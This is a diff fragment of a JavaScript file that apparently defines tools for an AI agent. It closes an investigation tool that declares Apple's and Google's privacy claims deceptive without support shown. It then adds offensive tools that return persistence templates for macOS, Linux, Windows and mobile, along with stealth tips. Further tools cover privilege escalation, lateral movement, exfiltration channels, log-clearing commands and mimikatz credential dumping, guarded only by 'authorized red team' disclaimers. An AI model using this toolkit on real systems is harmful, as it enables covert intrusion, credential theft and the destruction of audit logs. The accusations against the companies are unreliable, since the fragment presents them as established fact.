+ 'Screenshot of policy enforcement',
15314
+ 'Network capture of MDM commands',
15315
+ 'Log of policy application timestamp',
15316
+ ],
15317
+ };
15318
+ break;
15319
+ case 'generate_legal_exhibit':
15320
+ result = {
15321
+ exhibit_template: {
15322
+ title: 'Evidence of Deceptive End-to-End Encryption Claims',
15323
+ plaintiff: '[Your Name]',
15324
+ defendant: '[Apple Inc. / Google LLC]',
15325
+ sections: [
15326
+ '1. Executive Summary',
15327
+ '2. Marketing Claims (with URLs and archives)',
15328
+ '3. Technical Reality (with evidence)',
15329
+ '4. Contradiction Analysis',
15330
+ '5. Legal Basis for Action',
15331
+ '6. Evidence Exhibits',
15332
+ '7. Chain of Custody Documentation',
15333
+ '8. Cryptographic Integrity Proofs',
15334
+ ],
15335
+ legal_theories: [
15336
+ 'FTC Act Section 5 - Deceptive trade practices',
15337
+ 'Lanham Act - False advertising',
15338
+ 'State UCL - Unlawful business practices',
15339
+ 'CCPA - Transparency violations',
15340
+ 'Breach of implied contract',
15341
+ ],
15342
+ },
15343
+ };
15344
+ break;
15345
+ case 'full_apple_report':
15346
+ result = {
15347
+ report_title: 'Apple PQ3/iMessage False E2E Encryption Claims - Investigation Report',
15348
+ executive_summary: 'Apple\'s claim of "end-to-end encryption" for iMessage is technically deceptive. While the protocol encrypts messages in transit, Apple-controlled code has full access to plaintext before encryption and after decryption, MDM can enforce server-controlled policies on message handling, and iCloud backups provide Apple access to message keys.',
15349
+ sections: {
15350
+ pq3_analysis: applePQ3Analysis,
15351
+ mdm_investigation: appleMdmInvestigation,
15352
+ clipboard_exposure: appleClipboardExposure,
15353
+ frida_scripts: fridaScripts,
15354
+ mdm_profile: mdmProfile,
15355
+ },
15356
+ recommendations: [
15357
+ 'File FTC complaint with collected evidence',
15358
+ 'Submit California AG consumer protection complaint',
15359
+ 'Consider class action for deceptive advertising',
15360
+ 'Document all evidence with integrity proofs',
15361
+ ],
15362
+ };
15363
+ break;
15364
+ case 'full_google_report':
15365
+ result = {
15366
+ report_title: 'Google Privacy Violations - Investigation Report',
15367
+ executive_summary: 'Google\'s privacy practices contradict their public claims. Gmail content is analyzed for multiple purposes beyond spam filtering, Chrome collects more telemetry than disclosed, and Android tracking persists despite privacy settings.',
15368
+ sections: {
15369
+ gmail_scanning: googleGmailScanning,
15370
+ chrome_telemetry: googleChromeTelemetry,
15371
+ android_tracking: googleAndroidTracking,
15372
+ },
15373
+ recommendations: [
15374
+ 'File FTC complaint documenting undisclosed data collection',
15375
+ 'Submit ECPA complaint for email scanning',
15376
+ 'Document ad targeting correlation with email content',
15377
+ 'Test location tracking with all settings disabled',
15378
+ ],
15379
+ };
15380
+ break;
15381
+ default:
15382
+ result = { error: 'Unknown action', available_actions: [
15383
+ 'apple_pq3_analysis', 'apple_mdm_investigation', 'apple_clipboard_exposure',
15384
+ 'apple_backup_keys', 'apple_siri_plaintext', 'google_gmail_scanning',
15385
+ 'google_chrome_telemetry', 'google_android_tracking', 'google_play_services',
15386
+ 'generate_frida_scripts', 'generate_mdm_profile', 'generate_legal_exhibit',
15387
+ 'full_apple_report', 'full_google_report',
15388
+ ] };
15389
+ }
15390
+ if (outputFormat === 'markdown') {
15391
+ return '```json\n' + JSON.stringify(result, null, 2) + '\n```';
15392
+ }
15393
+ return JSON.stringify(result, null, 2);
15394
+ },
15395
+ },
15396
+ // ═══════════════════════════════════════════════════════════════════════
15397
+ // PERSISTENCE & CAPABILITY EXPANSION
15398
+ // ═══════════════════════════════════════════════════════════════════════
15399
+ {
15400
+ name: 'PersistenceManager',
15401
+ description: `Establish and maintain persistent access across reboots and updates.
15402
+
15403
+ Covers macOS, Linux, Windows, iOS, Android persistence mechanisms.
15404
+ For authorized red team exercises and security research.`,
15405
+ parameters: {
15406
+ type: 'object',
15407
+ required: ['platform', 'method'],
15408
+ properties: {
15409
+ platform: {
15410
+ type: 'string',
15411
+ enum: ['macos', 'linux', 'windows', 'ios', 'android'],
15412
+ },
15413
+ method: {
15414
+ type: 'string',
15415
+ enum: [
15416
+ 'launch_agent', 'launch_daemon', 'login_item', 'cron', 'systemd',
15417
+ 'rc_local', 'profile', 'bashrc', 'scheduled_task', 'registry',
15418
+ 'startup_folder', 'wmi', 'dylib_hijack', 'ld_preload', 'dll_hijack',
15419
+ 'boot_script', 'kernel_extension', 'plist_modification',
15420
+ ],
15421
+ },
15422
+ payload: { type: 'string', description: 'Payload to persist (path or inline)' },
15423
+ name: { type: 'string', description: 'Name for the persistence mechanism' },
15424
+ stealth: { type: 'boolean', default: true, description: 'Use stealth techniques' },
15425
+ },
15426
+ },
15427
+ handler: async (args) => {
15428
+ const platform = args['platform'];
15429
+ const method = args['method'];
15430
+ const name = args['name'] || 'com.research.persistence';
15431
+ const stealth = args['stealth'] !== false;
15432
+ // eslint-disable-next-line @typescript-eslint/no-explicit-any
15433
+ const persistence = {
15434
+ macos: {
15435
+ launch_agent: {
15436
+ path: `~/Library/LaunchAgents/${name}.plist`,
15437
+ template: `<?xml version="1.0" encoding="UTF-8"?>
15438
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
15439
+ <plist version="1.0">
15440
+ <dict>
15441
+ <key>Label</key>
15442
+ <string>${name}</string>
15443
+ <key>ProgramArguments</key>
15444
+ <array>
15445
+ <string>/bin/bash</string>
15446
+ <string>-c</string>
15447
+ <string>PAYLOAD_HERE</string>
15448
+ </array>
15449
+ <key>RunAtLoad</key>
15450
+ <true/>
15451
+ <key>KeepAlive</key>
15452
+ <true/>
15453
+ </dict>
15454
+ </plist>`,
15455
+ install: `launchctl load ~/Library/LaunchAgents/${name}.plist`,
15456
+ detection: 'Check ~/Library/LaunchAgents and launchctl list',
15457
+ stealth_tips: [
15458
+ 'Use Apple-like naming (com.apple.xxx)',
15459
+ 'Set StartInterval instead of KeepAlive',
15460
+ 'Avoid common malware naming patterns',
15461
+ ],
15462
+ },
15463
+ launch_daemon: {
15464
+ path: `/Library/LaunchDaemons/${name}.plist`,
15465
+ requires: 'root privileges',
15466
+ note: 'Runs as root, persists across all users',
15467
+ install: `sudo launchctl load /Library/LaunchDaemons/${name}.plist`,
15468
+ },
15469
+ login_item: {
15470
+ method: 'osascript',
15471
+ command: `osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/app", hidden:true}'`,
15472
+ note: 'Visible in System Preferences > Users > Login Items',
15473
+ },
15474
+ dylib_hijack: {
15475
+ technique: 'DYLD_INSERT_LIBRARIES or weak dylib',
15476
+ locations: [
15477
+ '@rpath dylib hijacking',
15478
+ 'Weak dylib injection',
15479
+ 'LC_LOAD_DYLIB modification',
15480
+ ],
15481
+ detection: 'otool -L, codesign verification',
15482
+ },
15483
+ kernel_extension: {
15484
+ path: '/Library/Extensions/',
15485
+ requires: 'SIP disabled, notarization, or MDM approval',
15486
+ note: 'Most powerful but most restricted on modern macOS',
15487
+ },
15488
+ },
15489
+ linux: {
15490
+ cron: {
15491
+ install: 'crontab -e or echo "* * * * * PAYLOAD" | crontab -',
15492
+ detection: 'crontab -l, /var/spool/cron/',
15493
+ stealth: 'Use @reboot instead of frequent intervals',
15494
+ },
15495
+ systemd: {
15496
+ path_user: '~/.config/systemd/user/',
15497
+ path_system: '/etc/systemd/system/',
15498
+ template: `[Unit]
15499
+ Description=${name}
15500
+
15501
+ [Service]
15502
+ ExecStart=PAYLOAD
15503
+ Restart=always
15504
+
15505
+ [Install]
15506
+ WantedBy=default.target`,
15507
+ install: 'systemctl --user enable ' + name,
15508
+ },
15509
+ rc_local: {
15510
+ path: '/etc/rc.local',
15511
+ note: 'Legacy but still works on many systems',
15512
+ },
15513
+ profile: {
15514
+ paths: [
15515
+ '/etc/profile',
15516
+ '/etc/profile.d/*.sh',
15517
+ '~/.profile',
15518
+ '~/.bash_profile',
15519
+ ],
15520
+ technique: 'Append payload execution',
15521
+ },
15522
+ ld_preload: {
15523
+ path: '/etc/ld.so.preload',
15524
+ technique: 'Preload malicious shared library',
15525
+ detection: 'Check LD_PRELOAD env and /etc/ld.so.preload',
15526
+ },
15527
+ },
15528
+ windows: {
15529
+ scheduled_task: {
15530
+ command: `schtasks /create /tn "${name}" /tr "PAYLOAD" /sc onlogon /ru SYSTEM`,
15531
+ detection: 'schtasks /query, Task Scheduler GUI',
15532
+ },
15533
+ registry: {
15534
+ keys: [
15535
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15536
+ 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15537
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
15538
+ ],
15539
+ command: `reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v ${name} /t REG_SZ /d "PAYLOAD"`,
15540
+ },
15541
+ startup_folder: {
15542
+ path: '%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup',
15543
+ technique: 'Drop .lnk or .bat file',
15544
+ },
15545
+ wmi: {
15546
+ technique: 'WMI Event Subscription',
15547
+ components: ['__EventFilter', '__EventConsumer', '__FilterToConsumerBinding'],
15548
+ detection: 'Get-WMIObject -Namespace root/subscription -Class __EventFilter',
15549
+ },
15550
+ dll_hijack: {
15551
+ technique: 'Place DLL in application search path',
15552
+ common_targets: [
15553
+ 'Missing DLLs in system applications',
15554
+ 'Side-loading via legitimate apps',
15555
+ ],
15556
+ },
15557
+ },
15558
+ ios: {
15559
+ note: 'Requires jailbreak for most persistence',
15560
+ methods: {
15561
+ launch_daemon: {
15562
+ path: '/Library/LaunchDaemons/',
15563
+ requires: 'Jailbreak with root filesystem write',
15564
+ },
15565
+ cydia_substrate: {
15566
+ path: '/Library/MobileSubstrate/DynamicLibraries/',
15567
+ technique: 'Tweak that loads into processes',
15568
+ },
15569
+ xpc_service: {
15570
+ technique: 'Malicious XPC service',
15571
+ },
15572
+ },
15573
+ },
15574
+ android: {
15575
+ methods: {
15576
+ boot_completed: {
15577
+ technique: 'BroadcastReceiver for BOOT_COMPLETED',
15578
+ manifest: '<receiver android:name=".BootReceiver"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>',
15579
+ },
15580
+ accessibility_service: {
15581
+ technique: 'Malicious accessibility service (very powerful)',
15582
+ permissions: 'Requires user to enable in Settings',
15583
+ },
15584
+ device_admin: {
15585
+ technique: 'Device Administrator with prevent-uninstall',
15586
+ },
15587
+ system_app: {
15588
+ technique: 'Install to /system/app/ (requires root)',
15589
+ },
15590
+ },
15591
+ },
15592
+ };
15593
+ const platformData = persistence[platform];
15594
+ if (!platformData) {
15595
+ return JSON.stringify({ error: 'Unknown platform', available: Object.keys(persistence) });
15596
+ }
15597
+ const methodData = platformData[method] || platformData['methods']?.[method];
15598
+ if (!methodData) {
15599
+ return JSON.stringify({
15600
+ error: 'Unknown method for platform',
15601
+ platform,
15602
+ available_methods: Object.keys(platformData),
15603
+ });
15604
+ }
15605
+ return JSON.stringify({
15606
+ platform,
15607
+ method,
15608
+ name,
15609
+ stealth,
15610
+ persistence: methodData,
15611
+ disclaimer: 'FOR AUTHORIZED RED TEAM AND SECURITY RESEARCH ONLY',
15612
+ }, null, 2);
15613
+ },
15614
+ },
15615
+ {
15616
+ name: 'CapabilityExpansion',
15617
+ description: `Expand capabilities on compromised systems - privilege escalation, lateral movement, data exfiltration.
15618
+
15619
+ For authorized penetration testing and red team exercises.`,
15620
+ parameters: {
15621
+ type: 'object',
15622
+ required: ['category'],
15623
+ properties: {
15624
+ category: {
15625
+ type: 'string',
15626
+ enum: ['privesc', 'lateral', 'exfil', 'defense_evasion', 'credential_access', 'collection'],
15627
+ },
15628
+ platform: { type: 'string', enum: ['macos', 'linux', 'windows', 'network'] },
15629
+ technique: { type: 'string', description: 'Specific technique to use' },
15630
+ },
15631
+ },
15632
+ handler: async (args) => {
15633
+ const category = args['category'];
15634
+ const platform = args['platform'] || 'all';
15635
+ const capabilities = {
15636
+ privesc: {
15637
+ macos: {
15638
+ techniques: [
15639
+ {
15640
+ name: 'sudo_caching',
15641
+ description: 'Exploit sudo timestamp caching',
15642
+ command: 'sudo -v && sudo /bin/bash',
15643
+ },
15644
+ {
15645
+ name: 'tcc_bypass',
15646
+ description: 'Bypass TCC permissions',
15647
+ methods: ['Synthetic clicks', 'Mounted DMG apps', 'TCC.db manipulation'],
15648
+ },
15649
+ {
15650
+ name: 'kernel_exploit',
15651
+ description: 'Exploit kernel vulnerabilities',
15652
+ tools: ['checkra1n (A5-A11)', 'Various CVEs'],
15653
+ },
15654
+ {
15655
+ name: 'dylib_injection',
15656
+ description: 'Inject into privileged processes',
15657
+ },
15658
+ ],
15659
+ },
15660
+ linux: {
15661
+ techniques: [
15662
+ {
15663
+ name: 'suid_binaries',
15664
+ command: 'find / -perm -4000 2>/dev/null',
15665
+ },
15666
+ {
15667
+ name: 'sudo_misconfig',
15668
+ command: 'sudo -l',
15669
+ },
15670
+ {
15671
+ name: 'kernel_exploit',
15672
+ tools: ['DirtyCow', 'DirtyPipe', 'Various CVEs'],
15673
+ },
15674
+ {
15675
+ name: 'capabilities',
15676
+ command: 'getcap -r / 2>/dev/null',
15677
+ },
15678
+ ],
15679
+ },
15680
+ windows: {
15681
+ techniques: [
15682
+ {
15683
+ name: 'unquoted_service_path',
15684
+ command: 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\\windows"',
15685
+ },
15686
+ {
15687
+ name: 'always_install_elevated',
15688
+ check: 'reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated',
15689
+ },
15690
+ {
15691
+ name: 'token_manipulation',
15692
+ tools: ['incognito', 'mimikatz'],
15693
+ },
15694
+ {
15695
+ name: 'uac_bypass',
15696
+ tools: ['UACME', 'fodhelper', 'eventvwr'],
15697
+ },
15698
+ ],
15699
+ },
15700
+ },
15701
+ lateral: {
15702
+ techniques: [
15703
+ {
15704
+ name: 'pass_the_hash',
15705
+ tools: ['mimikatz', 'impacket', 'crackmapexec'],
15706
+ },
15707
+ {
15708
+ name: 'pass_the_ticket',
15709
+ tools: ['mimikatz', 'Rubeus'],
15710
+ },
15711
+ {
15712
+ name: 'psexec',
15713
+ tools: ['impacket-psexec', 'Sysinternals PsExec'],
15714
+ },
15715
+ {
15716
+ name: 'wmi',
15717
+ tools: ['impacket-wmiexec', 'PowerShell'],
15718
+ },
15719
+ {
15720
+ name: 'ssh_hijack',
15721
+ technique: 'SSH agent forwarding hijack or key theft',
15722
+ },
15723
+ {
15724
+ name: 'rdp',
15725
+ tools: ['xfreerdp', 'rdesktop', 'SharpRDP'],
15726
+ },
15727
+ ],
15728
+ },
15729
+ exfil: {
15730
+ channels: [
15731
+ {
15732
+ name: 'dns_tunneling',
15733
+ tools: ['dnscat2', 'iodine', 'dns2tcp'],
15734
+ stealth: 'High - blends with legitimate DNS',
15735
+ },
15736
+ {
15737
+ name: 'https',
15738
+ tools: ['curl', 'wget', 'custom C2'],
15739
+ stealth: 'Medium - encrypted but inspectable',
15740
+ },
15741
+ {
15742
+ name: 'icmp',
15743
+ tools: ['icmpsh', 'custom'],
15744
+ stealth: 'Medium - often allowed through firewalls',
15745
+ },
15746
+ {
15747
+ name: 'cloud_storage',
15748
+ services: ['S3', 'Azure Blob', 'GCS', 'Dropbox API'],
15749
+ stealth: 'High - blends with legitimate traffic',
15750
+ },
15751
+ ],
15752
+ techniques: [
15753
+ 'Compression before exfil',
15754
+ 'Encryption of exfil data',
15755
+ 'Chunking large files',
15756
+ 'Timing-based exfil (slow and steady)',
15757
+ ],
15758
+ },
15759
+ defense_evasion: {
15760
+ techniques: [
15761
+ {
15762
+ name: 'timestomping',
15763
+ description: 'Modify file timestamps',
15764
+ tools: ['touch', 'timestomp'],
15765
+ },
15766
+ {
15767
+ name: 'log_clearing',
15768
+ commands: {
15769
+ linux: 'truncate -s 0 /var/log/*',
15770
+ windows: 'wevtutil cl Security',
15771
+ macos: 'sudo log erase --all',
15772
+ },
15773
+ },
15774
+ {
15775
+ name: 'amsi_bypass',
15776
+ platform: 'windows',
15777
+ techniques: ['Memory patching', 'Reflection', 'Provider unload'],
15778
+ },
15779
+ {
15780
+ name: 'etw_bypass',
15781
+ platform: 'windows',
15782
+ description: 'Disable Event Tracing for Windows',
15783
+ },
15784
+ {
15785
+ name: 'process_injection',
15786
+ techniques: ['DLL injection', 'Process hollowing', 'Thread hijacking'],
15787
+ },
15788
+ ],
15789
+ },
15790
+ credential_access: {
15791
+ techniques: [
15792
+ {
15793
+ name: 'mimikatz',
15794
+ platform: 'windows',
15795
+ commands: ['sekurlsa::logonpasswords', 'lsadump::sam'],
15796
+ },
15797
+ {
15798
+ name: 'keychain_dump',
15799
+ platform: 'macos',
15800
+ tools: ['security dump-keychain', 'chainbreaker'],
15801
+ },
15802
+ {
15803
+ name: 'browser_credentials',
15804
+ tools: ['LaZagne', 'SharpChrome', 'custom scripts'],
15805
+ },
15806
+ {
15807
+ name: 'ssh_keys',
15808
+ locations: ['~/.ssh/', '/etc/ssh/', 'SSH agent'],
15809
+ },
15810
+ {
15811
+ name: 'kerberoasting',
15812
+ platform: 'windows',
15813
+ tools: ['Rubeus', 'GetUserSPNs.py'],
15814
+ },
15815
+ ],
15816
+ },
15817
+ collection: {
15818
+ techniques: [
15819
+ {
15820
+ name: 'keylogging',
15821
+ tools: ['logkext (macOS)', 'xinput (Linux)', 'GetAsyncKeyState (Windows)'],
15822
+ },
15823
+ {
15824
+ name: 'screen_capture',
15825
+ commands: {
15826
+ macos: 'screencapture -x /tmp/screen.png',
15827
+ linux: 'import -window root /tmp/screen.png',
15828
+ windows: 'screenshot via PowerShell or API',
15829
+ },
15830
+ },
15831
+ {
15832
+ name: 'clipboard_monitoring',
15833
+ description: 'Monitor clipboard for sensitive data',
15834
+ },
15835
+ {
15836
+ name: 'file_collection',
15837
+ patterns: ['*.doc*', '*.xls*', '*.pdf', '*.key', '*.pem', 'id_rsa'],
15838
+ },
15839
+ ],
15840
+ },
15841
+ };
15842
+ const categoryData = capabilities[category];
15843
+ if (!categoryData) {
15844
+ return JSON.stringify({
15845
+ error: 'Unknown category',
15846
+ available: Object.keys(capabilities),
15847
+ });
15848
+ }
15849
+ return JSON.stringify({
15850
+ category,
15851
+ platform,
15852
+ capabilities: categoryData,
15853
+ disclaimer: 'FOR AUTHORIZED PENETRATION TESTING AND RED TEAM EXERCISES ONLY',
15854
+ }, null, 2);
15855
+ },
15856
+ },
14581
15857
  ],
14582
15858
  };
14583
15859
  }